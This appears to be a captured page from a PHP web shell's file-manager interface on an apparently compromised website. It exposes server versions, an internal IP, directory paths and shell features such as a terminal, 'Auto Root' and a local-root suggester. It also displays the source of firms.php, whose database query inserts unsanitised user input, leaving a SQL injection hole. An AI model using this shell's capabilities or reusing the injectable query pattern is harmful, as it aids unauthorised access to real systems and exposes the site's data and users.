Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
autosuggest /
Delete
Unzip
Name
Size
Permission
Date
Action
css
[ DIR ]
drwxr-sr-x
2011-07-22 10:01
js
[ DIR ]
drwxr-sr-x
2011-07-22 10:01
contacts.php
1.38
KB
-rw-r--r--
2018-03-12 11:00
firms.php
691
B
-rw-r--r--
2021-06-23 10:12
organisation.php
721
B
-rw-r--r--
2011-07-22 10:13
php_errors.log
10.07
KB
-rw-r--r--
2026-08-21 07:27
Save
Rename
<?php header("Content-type: text/xml"); /*the returned xml has the following structure <results> <rs>foo</rs> <rs>bar</rs> </results>*/ include("../php/inc_db.php"); $SearchField = "FirmName"; ?><results> <?php $sSqlWrk = "SELECT FirmID, FirmName FROM tblMemberFirms WHERE UPPER(FirmName) LIKE '%".strtoupper($_GET["Input"])."%' AND MemberStatus='Member' ORDER BY FirmName"; //echo $sSqlWrk; $recwrk = mysql_query($sSqlWrk); while ($rswrk = mysql_fetch_assoc($recwrk)) { $sDisplay = trim($rswrk["FirmName"].""); ?><rs id="<?php echo $rswrk["FirmName"]; ?>" info="<?php echo $rswrk["FirmID"]; ?>"><?php echo $sDisplay; ?></rs> <?php } mysql_free_result($recwrk); ?></results>